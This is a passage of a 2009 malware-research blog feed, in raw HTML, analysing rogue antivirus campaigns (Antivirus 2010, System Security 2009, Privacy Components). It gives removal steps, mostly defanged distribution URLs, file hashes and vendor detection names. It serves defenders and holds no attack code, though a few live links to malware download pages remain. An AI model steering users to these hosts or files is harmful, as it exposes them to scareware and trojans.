Security\<br />System Security 2009 Support.lnk" <br /><br />UninstallString = "%Programs%\System Security\System Security 2009 Support.lnk" <br /><br />DisplayIcon = "%CommonAppData%\*random file name*\*random filename.exe*,0" <br /><br /> </li> <li>[HKEY_LOCAL_MACHINE\SOFTWARE\00309781]<br /><br />pc*random 8-digit*ins = 0x00000001 </li></ul>* random key name: <br />32 alpha-numeric value like 90BF8224-CD63-4081-A4C7-EF9A2CF6596F<br /><br />* random 8-digit: <br />8 digit value like pc00309781ins "The same number of the executable"<br /><br />- <u>Delete files and folders</u>:<br /><br /><ul style="list-style-type:none"> <li>► %CommonAppData%\*random name*\pc*random 8-digit*ins </li> <li>► %CommonAppData%\*random name*<br />► %DesktopDir%\System Security 2009.lnk <br />► %Programs%\System Security\</li> <li>► %Programs%\System Security\System Security 2009 Support.lnk <br />► %Programs%\System Security\System Security 2009 Support.lnk<br />► %Programs%\System Security\System Security 2009.lnk </li></ul></div><br /></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-8285373162434627527?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-88379481129054383352009-03-24T06:58:00.000-07:002009-03-24T07:04:22.195-07:00best-click-scanner.info Antivirus 2010 Rogue AntiSpyware<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="1982" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr> <td colspan="2" valign="top" height="833"><p><span style="font-size:14px; font-weight:bold">best-click-scanner.info Antivirus 2010 Rogue AntiSpyware</span><br /><br />best-click-scanner.info, av1-click-download.info and av-click-site.info are site that distribute<br />Antivirus 2010 a new rogue antivirus application<br /><br />Site screenshot:<br /><br />hxxp://best-click-scanner.info/scan.php [67.205.75.14]<br /><br /><u><b>Fake Microsoft Security Warning Message</b></u>:<br /><br /> Trojan.Mytob<br /> Trojan.Zlob.z<br /> Worm.Apache.x<br /> Spyware.IEMonster.b<br /> Zlob.PornAdvertiser.Xplisit<br /> Trojan.InfoStealer.Banker.s <br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScjVVL-d61I/AAAAAAAAAL4/L3kx8NPw_8M/s1600-h/Fake.Spyware.IEMonster.b-best-click-scanner.info.jpg"></a><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjVU7LMa3I/AAAAAAAAALw/du4BZHmwj2w/s1600-h/Antivirus2010-best-click-scanner.info.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 245px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjVU7LMa3I/AAAAAAAAALw/du4BZHmwj2w/s320/Antivirus2010-best-click-scanner.info.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316733915569613682" /></a><br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScjVVL-d61I/AAAAAAAAAL4/L3kx8NPw_8M/s1600-h/Fake.Spyware.IEMonster.b-best-click-scanner.info.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 237px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScjVVL-d61I/AAAAAAAAAL4/L3kx8NPw_8M/s320/Fake.Spyware.IEMonster.b-best-click-scanner.info.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316733920079637330" /></a><br /><br /><u><b>Fake messages</b></u>:<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScjYTrin40I/AAAAAAAAAMA/VQ_XfvbZ9U4/s1600-h/Rogue.Antivirus2010-best-click-scanner.info.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 72px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScjYTrin40I/AAAAAAAAAMA/VQ_XfvbZ9U4/s320/Rogue.Antivirus2010-best-click-scanner.info.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316737192727929666" /></a><br /><br /></p><table width="343" border="1" style="border:solid 1px #CCC" cellspacing="0" cellpadding="0"><tr> <td width="339" height="117"><i>Harmful and malicious software detected. These programs may damage your computer and steal your private information. Online Security Scanner requires Antivirus 2010 components to protect your computer. Please click OK to download and install Antivirus 2010 components.</i></td></tr></table><p>Associated website [70.38.19.206]<br /> <br /> av1-click-download.info<br /> av-click-site.info<br /> <br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScjdT733qpI/AAAAAAAAAMY/nXRP2GG5X_k/s1600-h/av1-click-site.com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 284px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScjdT733qpI/AAAAAAAAAMY/nXRP2GG5X_k/s320/av1-click-site.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316742694670150290" /></a> <br /><br /></p></td></tr> <tr> <td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis:</b></td></tr> <tr><td height="208" valign="top"><br /></td><td><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td> <td colspan="2">hxxp://av1-click-download.info/install.php?campaign=&country=</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="91"><b>File info</b>:</td><td colspan="2">AntiVirusInstaller.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">45588 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">4b28cc4e75b9f7d38725e76d05ffdea3</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=4b28cc4e75b9f7d38725e76d05ffdea3" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/a99923f43aa86fcab019513814dbaadc" target="_blank">Report</a></td><td> </td></tr> <tr><td> </td><td><b>Sunbelt</b>:</td><td colspan="2"><a href="http://research.sunbelt-software.com/partnerresource/MD5.aspx?md5=4b28cc4e75b9f7d38725e76d05ffdea3" target="_blank">Report</a></td><td> </td> </tr> <tr><td> </td><td><b>Prevx</b>:</td><td colspan="2"><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=F9087D0F14D1B013B27000343E7C3E004443FB03" target="_blank">Report</a></td><td> </td> </tr> <tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2"><span id="status_fecha">03.23.2009 17:33:31 (CET)</span><br /></td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">14/39 (35.90%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="238"><span style="color:#FF0000">Trojan.Win32.Tibs!IK</span></td><td width="157">a-squared</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">HEUR/Crypted</span></td><td>Antivir</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.DownLoad.33135</span></td> <td>DrWeb</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td> eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.Tibs</span></td><td>Ikraus</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.FraudLoad.vmza</span></td> <td>Kaspersky</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Generic!Artemis</span></td><td>McAfee+Artemis</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Heuristic.Crypted</span></td><td>McAfee-GW-Edition</td><td> </td></tr> <tr><td> </td><td> </td><td width="238"><span style="color:#FF0000">Trojan:Win32/Tibs.IT</span></td><td>Microsoft</td><td> </td> </tr> <tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td>Panda</td><td> </td> </tr> <tr><td> </td><td> </td><td><span style="color:#FF0000">Medium Risk Malware</span></td><td>Prevx1</td><td> </td> </tr> <tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.DL.Win32.Mnless.cok</span></td><td>Rising</td><td> </td> </tr> <tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Fakeavalert</span></td><td>Symantec</td><td> </td> </tr> <tr><td> </td><td> </td><td><span style="color:#FF0000">Cryp_FakeAV-11</span></td><td>TrendMicro</td><td> </td> </tr> </table> <br /></td></tr> <tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis of av1-click-download.info/en/PE/svchost.exe:</b></td></tr> <tr><td height="208" valign="top"><br /></td><td><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td> <td colspan="2">hxxp://av1-click-download.info/en/PE/svchost.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="101"><b>File info</b>:</td><td colspan="2">svchost.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">80896 Bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">9ce49f6f3b41260def0a53a85d95f0d3</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=9ce49f6f3b41260def0a53a85d95f0d3" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>Anubis:</b></td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=104e0c0dc6daaf21411f62861b47c9fef&format=html" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/9f9e57b6505e1c8ebc5ba6b9316f591b" target="_blank">Report</a> - <a href="http://www.virustotal.com/analisis/d8176c3c8c6057dd5ae12b8d54690bb9" target="_blank">Reanalysed</a></td><td> </td></tr> <tr><td> </td><td><b>Sunbelt</b>:</td><td colspan="2"><a href="http://research.sunbelt-software.com/partnerresource/MD5.aspx?md5=9ce49f6f3b41260def0a53a85d95f0d3" target="_blank">Malware Report for ID: 8064472</a></td><td> </td> </tr> <tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2">03.24.2009 06:11:38 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">Result: 8/38 (21.05%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="228"><span style="color:#FF0000">TR/Fakealert.WW.2</span></td> <td width="157">Antivir</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious file</span></td><td>eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious:W32/Malware!Gemini</span></td><td>F-Secure</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan:Win32/Tibs.IT</span></td><td> Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious file</span></td> <td>Panda</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">AdWare.Win32.FakeAV.q</span></td><td>Rising</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Fakeavalert</span></td> <td>Symantec</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">PAK_Generic.001</span></td><td>TrendMicro</td><td> </td></tr></table> <br /></td></tr> <tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Result when running:</b></td></tr> <tr><td height="200"> </td><td><br />Display fake BlueScreen "MALWARE.MONSTER.DX_NEW_0xA21518F0" <br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjhFLB_2PI/AAAAAAAAAMg/on_9hSLUXPc/s1600-h/fake-bsod.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjhFLB_2PI/AAAAAAAAAMg/on_9hSLUXPc/s320/fake-bsod.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316746839087634674" /></a><br /><br /></td></tr> <tr> <td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis of av1-click-download.info/en/PE/install.exe:</b></td></tr><tr><td width="25" height="208" valign="top"><br /></td><td width="547"><br /><table width="514" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td><td>hxxp://av1-click-download.info/en/PE/install.exe</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td width="25"> </td><td width="88"><b>File info</b>:</td><td width="384">install.exe</td><td width="17"> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>File size</td><td>45568 Bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>e079854d56607f16fb0d5db3b724c0de </td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td><a href="http://www.threatexpert.com/report.aspx?md5=e079854d56607f16fb0d5db3b724c0de" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>Anubis:</b></td><td><a href="http://anubis.iseclab.org/?action=result&task_id=18e8a9be9a4116bc459f2100afeab8100&format=html" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/612eb2eeb8a64689184f4b5a03c73319" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>First received</td><td>03.21.2009 16:00:04 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>12/39 (66.67%)</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td><span style="color:#FF0000">W32/FakeAV.8074!tr</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.FraudLoad.vmtk</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">SHeur2.WXJ</span></td><td> </td></tr><tr> <td> </td><td> </td><td><span style="color:#FF0000">TR/Crypt.XPACK.Gen</span></td><td> </td></tr><tr> <td> </td><td> </td><td><span style="color:#FF0000">Sus/FakeAV-A</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.Tibs (Sig-Id:470535) [Ikarus Virus Scanner]</span></td><td> </td></tr></table><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Result when running:</b></td></tr><tr><td height="200"> </td><td><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/ScjjL5dpjsI/AAAAAAAAAMo/cMfcqaGeTMI/s1600-h/Anti-Virus+Number-1+Installer.bmp"><img style="cursor:pointer; cursor:hand;width: 320px; height: 177px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/ScjjL5dpjsI/AAAAAAAAAMo/cMfcqaGeTMI/s320/Anti-Virus+Number-1+Installer.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5316749153654116034" /></a><br /><br /></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-8837948112905438335?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-15269830363433036702009-03-24T00:51:00.000-07:002009-03-24T00:57:32.965-07:00tube-funs-world-com Spyware (Privacy Components)<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="2095" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td colspan="2" valign="top" height="92"><p><span style="font-size:14px; font-weight:bold">tube-funs-world.com - Rogue.AntiSpyware.Sysguard "Privacy components"</span><br /> <br />Privacy Components is another rogue antispyware that displays fake security alerts,<br />This program is known to be installed on computers without users approval,<br />
dropped by a trojan or using other malicious technics.<br /></p></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis:</b></td></tr><tr><td width="25" height="208" valign="top"><br /></td><td width="547"><br /><table width="514" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td colspan="2">Fake PornTube website</td><td> </td></tr><tr><td colspan="3"> </td><td> </td></tr><tr><td> </td><td colspan="2">hxxp://tube-funs-world.com/promo2/?aid=561&vname=free_dvd_rip<br />
hxxp://tube-funs-world.com/promo2/?aid=561&vname=stream_player_plugin</td><td> </td></tr><tr><td colspan="4"> </td></tr><tr><td> </td><td colspan="3">hxxp://tube-funs-world.com/promo2/2.php?aid=561&vname=stream_player_plugin</td></tr><tr><td> </td><td colspan="2">stream_player_plugin.exe</td><td> </td></tr><tr><td colspan="4"> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td colspan="4"> </td></tr><tr><td> </td><td colspan="3">Fake scannerwith the look of Windows Explorer</td></tr><tr><td colspan="4"> </td></tr><tr><td> </td><td colspan="3">hxxp://tube-funs-world.com/promo3/</td></tr><tr><td> </td><td colspan="3">hxxp://tube-funs-world.com/promo3/get.php?aid=0&vname=protect</td></tr><tr><td> </td><td colspan="3">protect.exe (same file - )</td></tr><tr><td colspan="4"> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td colspan="4"> </td></tr><tr><td> </td><td colspan="3">Some java scripts</td></tr><tr><td colspan="4"> </td></tr><tr><td> </td><td colspan="3">hxxp://tube-funs-world.com/promo4/</td></tr><tr><td> </td><td colspan="3">hxxp://tube-funs-world.com/promo4/get.php?aid=0&vname=stream_player_plugin</td></tr><tr><td> </td><td colspan="3">stream_player_plugin.exe (same file)</td></tr><tr><td colspan="4"> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td colspan="4"> </td></tr><tr><td> </td><td colspan="3">Another Fake PornTube website with the logo SexTube</td></tr><tr><td colspan="4"> </td></tr><tr><td> </td><td colspan="3">http://tube-funs-world.com/promo5/</td></tr><tr><td> </td><td colspan="3">http://tube-funs-world.com/promo5/get.php?aid=0&vname=setup</td></tr><tr><td colspan="4"> </td></tr><tr><td> </td><td colspan="3">setup.exe (same file)</td></tr><tr><td colspan="4"> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"&g